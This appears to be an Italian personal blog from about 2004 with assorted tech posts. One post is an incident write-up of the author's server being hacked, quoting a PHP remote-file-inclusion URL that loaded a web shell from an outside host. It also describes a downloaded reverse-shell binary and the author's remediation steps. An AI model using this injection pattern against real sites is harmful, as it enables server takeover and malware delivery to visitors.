Ieri sera mia zia doveva installare il Windows Media Player 9 Series per potre vedere le partite di calcio con RossoAlice. Non è stato facile e ci siamo scontrati con una serie di difficoltà di Windows. Una di queste difficoltà la potete ammirare in quest’immagine: la scritta principale della finestra asserisce che “L’installazione di Window Media Player 9 Series è completa” e ringrazia della scelta, ma poco più sotto una scritta minuscola ci informa che è “Impossibile completare l’installazione” e che “Windows Media Player 9 Series non è installato”. E allora? L’installazione è completa o no? Decidiamoci.

Alla fine abbiamo risolto con il Windows Update ma sembra comunque che non ci sia banda sufficiente per vedere una partita.

Non sembra, ma Internet oggi compie formalmente 35 anni.

Il progetto mePhoto procede a passo d’uovo, inesorabile come il susseguirsi delle stagioni (infatti siamo a Maggio e fa un freddo cane & piove). L’interesse riscosso da questo incredibile progetto di Edo & Mau da parte dell’intera comunità Internet mi costringe a creare un’apposita Mailing list che, per il momento, raccoglierà idee, richieste e discussioni di sviluppatori e utenti.

La mailing list ha questo indirizzo: mephoto@manetti.homelinux.com.
Se volete iscrivervi, inviate un messaggio di posta elettronica all’indirizzo minimalist@manetti.homelinux.com, con subject “subscribe mephoto”. Verrete automaticamente iscritti con l’indirizzo di posta elettronica del mittente del vostro messaggio.

Il sito ufficiale del progetto mePhoto è qui. Trovate alcune gallery di prova qui, e qui.
Il CVS del progetto è disponibile sul web a questo indirizzo: http://manetti.homelinux.com/cgi-bin/viewcvs.cgi/mePhoto/.

Liberamente tradotto dalla pagina ufficiale del progetto mePhoto:

Edo & Mau hanno sentito il bisogno di un “photo browser” che soddisfacesse le loro necessità. Ci sono migliaia di programmi (di gran lunga migliori) che svolgono questo compito, ma abbiamo comunque deciso di scrivercelo da soli.

Attenzione: questo pezzettino di software non è in alcun modo stabile: è appena nato.

Abbiamo stilato un freddo campionario delle frasi che queste qui dicono… ehm, no scusate, il traduttore si è lasciato prendere la mano. Dicevo, abbiamo composto una lista delle caratteristiche che vorremo implementare in mePhoto.

• Photogallery scritta in PHP, con strumenti per scaricare le foto dalla propria macchina fotografica usb-storage compatibile, crezione delle miniature, etc.
• Possibilità di definire varie gallerie, con didascalie, testi
• Creazione di miniature di dimensioni scelte dall’utente
• Pulsanti successivo e precedente nella modalità vista singola e pagina di miniature
• Commenti di testo e didascalie per ciascuna foto (supporto ai dati exif)
• (Eventualmente) effetti speciali sulle foto
• Alta configurabilità della galleria con l’uso di template
• Link diretto a ciascuna immagine della galleria tramite menù
• Rilascio con licenza GPL

Per il momento mePhoto dipende dai seguenti software:

• bash
• PHP4
• Imagemagick (convert)
• Apache 1.x

È stato usato e testato solo su macchine Debian GNU/Linux.

Hai i tuoi blog preferiti, i tuoi siti preferiti, le tue fonti di informazione sul web più interessanti, i Debian Security Advisor: tutta ’sta roba da leggere.
Sei sei un drogato del web come me, un Internet addicted, perdi un sacco di tempo, ogni giorno, a vagolare tra un sito e l’altro. Ti perdi, impazzisci, bestemmi per la miriade di popup e informazioni pubblicitarie che ti tocca a vedere, per le home page piene di informazioni e link aggiuntivi che non ti servono a niente. Pagine che vorresti scavalcare per leggere solo l’elenco delle cose nuove. E poi, diciamoci la verità, non sono davvero tutte, le news e i post che ti interessano, ma solo una parte.
Be’, la soluzione esiste da tempo, anche se non per tutti i tuoi siti preferiti. La soluzione si chiama Feed XML.
Lo sapevo che esisteva ’sta roba, ma fino a che non mi sono cimentato a costruire il Feed RSS per questo blog non avevo provato l’ebrezza e la praticità di un news aggregator, la sconcertante e inebriante rivelazione nello scoprire che, in poco tempo, le leggi tutte. Quasi fosse l’elenco dei messaggi di un newsgroup, ma (quasi) senza thread e scritti da autori accreditati dalla tua scelta personale, con il link diretto ad approfondire solo ciò che ti interessa. E poi, il news aggregator, quando c’è qualche novità, ti avverte!!

Ma di cosa si tratta? Cos’è ’sta roba?

Non lo posso certo spiegare meglio di quanto ha fatto nel suo articolo su MyTech Antonio Volpon:

«Si chiama Rss (Really Simple Syndication o Rich site summary, secondo le versioni dello standard), è molto popolare fra i più assidui frequentatori della Rete ed è una specie di uovo di colombo per la diffusione dei contenuti (content syndication) sul Web.

Per farla breve, grazie al formato Rss è possibile avere una rassegna (per esempio il titolo di un articolo) dei nuovi contenuti trovati in Internet (su molteplici siti), e arrivare direttamente alla pagina che li ospita, senza passare per le varie home page. Condizione? Il sito deve rendere disponibile i propri contenuti attraverso questo formato: la consultazione del tutto poi è facilitata dall’adozione di strumenti chiamati news aggregator. »

Di news aggregator ne esistono parecchi, per tutte le piattaforme.
Personalmente uso Straw (piuttosto scarno ma funzionale) in Gnome e SharpReader con Windows.

Problema: il mio sito di news generiche in lingua italiana preferito, Google News, non ha i feed RSS. Che fare?
Soluzione: mi scrivo il software che crea da solo il feed XML a partire dalle pagine di Google News e poi lo metto nel cron.
Funziona?
Per ora sì. Però gli ci vuole il Python 2.3 per funzionare e in più lo script assume che il formato HTML di una certa pagina di Google News, da cui ricava le news, non cambi. Be’, se cambierà, poco male, si corregge.

Ebbene vi piacerebbe avere il feed XML di Google News? Volete avere lo script Python rilasciato con licenza GPL? Niente da fare, ahimé!
Infatti ho scritto a quelli di Google News per sapere se lo posso legittimamente fare, ’sto truschino, e loro garruli e solerti per il momento mi hanno detto di no…

Quest’uomo è l’origine della mia passione, il WWW. Forse meglio dire droga. Costui è l’inventore della splendida tennologia che ci consente di visitare il sito di Playboy, come pure di pubblicare la nostra finestrina privata su Internet e tante altre belle cose.
Da Punto Informatico:

Berners-Lee è il primo individuo a vedersi assegnare il Millennium Technology Prize, che consiste in una borsa da 1 milione di euro e nel riconoscimento del ruolo assunto dallo scienziato nel promuovere sviluppo ed economia “a misura d’uomo”.
…
Oggi Berners-Lee, alla guida del W3C in seno al Massachussets Institute of Technology, continua a lavorare per lo sviluppo del web in un’ottica di accesso il più aperto possibile alle tecnologie, lui che ha rinunciato a brevetti che avrebbero potuto arricchirlo enormemente.

Può accadere, durante la navigazione, di inserire sul proprio browser (o richiamare cliccando su di un link) l’indirizzo di un ipertesto e di veder comparire, invece della normale pagina, una pagina contenente un grosso messaggio del tipo Error 404: Not found, seguita da altre indicazioni.

Questo messaggio è una pagina ipertestuale come tutte le altre, che viene però creata sul momento dal server HTTP del computer indicato nell’indirizzo, in modo da avvertirvi che l’oggetto da voi richiesto non è stato trovato, ossia che sull’hard disk di tale computer non esiste nessun file con il nome e il percorso indicati nell’URL.

Il numero 404 è un codice d’errore stabilito dal protocollo HTTP. Il testo esatto del messaggio può variare a seconda della versione e del tipo di server HTTP installato sul computer remoto;
quasi tutti i server offrono la possibilità di personalizzare i messaggi di errore, e molti amministratori e programmatori lo fanno, anche per divertimento.

Le ultime versioni di Microsoft Internet Explorer, a meno di non cambiare alcuni parametri di configurazione, visualizzano un messaggio predefinito, molto simile per i vari tipi di errore che si possono incontrare nella normale navigazione, e che possono anche essere molto diversi dal classico 404. Questo rende generalmente più complicato per gli sviluppatori web (leggi Mau) capire velocemente le cause dell’errore.

Il sito 404 Research Lab offre una panoramica dei più divertenti Error 404 del web e spiega per filo e per segno cos’è un 404, come questo codice è nato e quali leggende metropolitane sono sorte intorno a questo numero, cosa fare quando lo si incontra, perché può essere vantaggioso personalizzarlo, come personalizzarlo sul proprio web server, etc…

Un 404 che ho trovato particolarmente divertente, anche se si tratta di umorismo un po’ macabro, è il 404 del sito Lorenzone.it.

…after compromise

Il 10 marzo la macchina che ospita questo sito è stata violata: ecco come…

Scoprirlo non era un compito tanto arduo da richiedere l’intervento del detective di Baker Street.
Lo zio Yurix direbbe: “elementare Giannozzon”. Basta guardare i file di log, e guardarli bene.

Alle ore 15:51:20 CET del 9 marzo 2004 uno script Python (o identificatosi come tale) probabilmente eseguito in automatico, effettuava una strana richiesta alla pagina display.php di questo sito per verificare presumibilmente la vulnerabilità della pagina a un certo tipo di attacco.
La richiesta veniva effettuata dall’host aspiron.ee, apparentemente estone, ma di fatto corrispondente ad un indirizzo IP appartenente alla rete di un provider texano, di Houston, e precisamente Everyones Internet, Inc..
Chiunque avesse lanciato lo script non si è fatto aspettare: il giorno dopo, 10 marzo 2004, a partire dalle 09:38:58 CET e fino alle 09:47:10 CET qualcuno ha effettuato varie richieste simili alla pagina vulnerabile con il preciso scopo di violare la sicurezza di cicciobaiano. Questa volta si è collegato da un diverso host, ma sempre dello stesso provider texano (di merda).

La pagina display.php includeva (come si usa fare comunemente in php) file esterni, il cui percorso veniva passato, per comodità e grazie a un colpo di genio del sottoscritto degno di Forrest Gump, come parametro in querystring. Avevo previsto, per sicurezza, di limitare l’uso di file php da includere ad una certa cartella del filesystem, ma non avevo previsto che potessero essere inclusi anche file esterni scaricati dalla pagina tramite http.
La chiamata della pagina vulnerabile da parte del cracker appare in questo modo:

http://manetti.homelinux.com/~maurizio/display.php?module=http://madcru.tripod.com/2

Questo ha consentito al presunto cracker texano di far eseguire all’interno della mia pagina il codice PHP reperibile all’indirizzo http://madcru.tripod.com/2.php ospitato sui server di Tripod, celebre sito di hosting gratuito (adesso rimosso dai gestori di Tripod per ovvi motivi).
In questa piccola ma efficace pagina era presente il codice sufficiente a presentare una form (all’interno del mio sito) attraverso la quale potevano essere eseguiti comandi di shell arbitrari. Ovviamente tali comandi venivano eseguiti con i permessi dell’utente non privilegiato www-data. Ma ciò è stato sufficiente.
Il cracker ha effettuato tre soli comandi, e gli sono bastati.
Con il primo ha scaricato via http, tramite wget, un file reperibile su un sito britannico compromesso, probabilmente dallo stesso cracker, di cui ho provveduto ad avvertire i gestori. Tale file è stato scaricato con il nome di a.out in /tmp. Si tratta di un ELF binary.
La seconda chiamata della pagina è probabilmente servita al cracker texano per eseguire il programma scaricato.
Con la terza sembra aver riavviato il web server Apache.
Ma ovviamente ad ogni chiamata potrebbero essere stati eseguiti più comandi. I contenuti delle richieste di tipo POST purtroppo non vengono loggati.

Che cosa fa il programmino a.out di appena 17KB?
Ci tornerò tra un attimo.

Il programma malevolo è stato scaricato alle 09:39:20 CET del 10 marzo 2004.
Alle 09:42:55 CET è stata cambiata la password dell’utente di sistema mysql.
Non ho idea del perché. Non sono stati cambiati dati sul database mysql.
Però sembra sia stata modificata la libreria mysql.so, utilizzata dal php per interfacciarsi al database.
Altro danno, non visibile dai log, è stato la modifica del file di configurazione /etc/php4/apache/php.ini, con modifica degli attributi, tramite chattr, per rendere immutabile il file.

La conseguenza di questa serie di cosine simpatiche è stata di fatto quella di far comparire un codice HTML sulle pagine di questo sito, codice volto a far scaricare un dialer per pornografia ai visitatori del sito muniti di Microsoft Internet Explorer. Tale codice è rimasto attivo almeno fino a mezzanotte, quando sono riuscito a reinstallare da zero il PHP, senza però averci capito molto.

Com’è riuscito a fare tutto ciò il bastardo cracker texano?
In primo luogo grazie all’arguzia del sottoscritto che ha messo a disposizione del mondo una pagina per l’esecuzione di comandi di bash su cicciobaiano. In secondo luogo tramite il programmino scaricato e lanciato dall’utente www-data.

Ecco cosa mi succedeva lanciando un semplice ls -l

<1>Unable to handle kernel NULL pointer dereference at virtual address
					00000000
printing eip:
00000000
*pde = 00000000
Oops: 0000
CPU:    0
EIP:    0010:[<00000000>]    Tainted: P
EFLAGS: 00010293
eax: 00000109   ebx: c78a2000   ecx: bfffdc20   edx: 00000018
esi: 00000016   edi: ffffffff   ebp: bfffdbf8   esp: c78a3fc0
ds: 0018   es: 0018   ss: 0018
Process ls (pid: 32274, stackpage=c78a3000)
Stack: c0106f47 00000000 bfffdc20 40023214 00000016 ffffffff bfffdbf8
					00000109
        0000002b 0000002b 00000109 40020e46 00000023 00000256 bfffdbdc
					0000002b
Call Trace:    [system_call+51/56]

Code:  Bad EIP value.

Il kernel non stava bene, soffriva le pene, ma più il problema non si pone.

Il programmino malevolo deve essere lanciato con due parametri che sono l’indirizzo IP e la porta di un host esterno col quale tenta di stabilire una connessione.
Se l’host remoto è in ascolto su quella porta del TCP il programma stabilisce una connessione e presenta all’altro capo della connessione il seguente output (ho provato usando netcat)

Fuck you so
sh-2.05b$

Dove sh-2.05b$ è il prompt di una shell. Però su questa shell si continua a essere loggati come l’utente che ha eseguito il programma dall’altro lato della connessione, quindi non so poi come abbia fatto a fare tutto il resto. Cioè, una volta avuto accesso ad una shell vera e propria, è riuscito a sfruttare qualche altra vulnerabilità del sistema per ottenere privilegi di root, ma non so quale.

Le contromisure per ora adottate sono state:

1. formattazione e reinstallazione del sistema
2. passaggio a Debian stable
3. aggiornamento del kernel all’ultima versione
4. correzione alla pagina php vulnerabile e controllo di simili vulnerabilità in altre pagine
5. installazione di strumenti di intrusion detection quali AIDE e Tiger
6. mounting leggermente più attento delle partizioni
7. mail di segnalazione abuse al provider texano

Comunque l’hardening del sistema è appena cominciato

Ema mi manda questa notizia:

In pensione l’inventore del «Ctrl+Alt+Canc»

L’informatico David Bradley oggi in ufficio per l’ultima volta
Inventò la combinazione di tasti per resettare il computer

30/01/2004 - Forse non avete mai visto la sua faccia. Probabilmente il suo nome non vi dice niente. Ma se siete utenti Microsoft senza dubbio conoscerete e, soprattutto, utilizzerete la combinazione del suo successo: Ctrl+Alt+Canc. A quella combinazione è legato per sempre il nome dell’inventore: David Bradley, un uomo che oggi mette piede per l’ultima volta nel suo ufficio perch? dopo 29 anni di lavoro da domani sar? un pensionato. Per il suo lavoro, quindi, reset definitivo: David Bradley, uno della «sporca dozzina» di ingegneri che crearono il primo personal computer Ibm, chiude qui la sua carriera.
DIRIGENTE IBM - Bradley è l’autore del codice per i Bios dei primi Pc ed è diventato già in giovanissima età uno dei più importanti dirigenti della IBM. Ma il suo nome è legato soprattutto alla famosissima - e probabilmente la più usata in assoluto nella storia dei personal computer - combinazione di tasti Ctrl-Alt-Canc, utilizzata per «resettare» il computer. All’inizio IBM non voleva rendere pubblica la combinazione dei tasti, ma alla fine la cosa filtrò fuori dagli uffici della società sotto la pressione di sviluppatori e tecnici, sempre più numerosi anche all’interno dell’azienda.

Nel filmato, alla presenza di Bill Gates, Bradley spiega l’origine dello shortcut più usato del mondo e prende allegramente in giro il big di Redmond per la popolarità che solo lui è riuscito a dargli.

Per Natale il regalo di Zeff & Manta all’umanità, con il contributo del Mau: la riattivazione del servizio di pubblicazione remota del Polygen. Non sai dove, come, ma soprattutto perché, pubblicare frasi autogenerate dal Polygen sul tuo sito? Bene, adesso puoi, anche se potevi ugualmente prima, ma poi non potevi più per un po’, quindi oggi di nuovo puoi e questo grazie anche al dignitoso server di casa Manetti, il Cicciobaiano.
Ovviamente questo post [non] è volutamente poco chiaro e qualcuno potrebbe persino pensare che sia autogenerato, ma non lo è. Comunque, se ancora non sapete cosa sia il Polygen, è giunto il momento di scoprirlo, orsù, andate gaudenti.
In ogni caso BUON NATALE.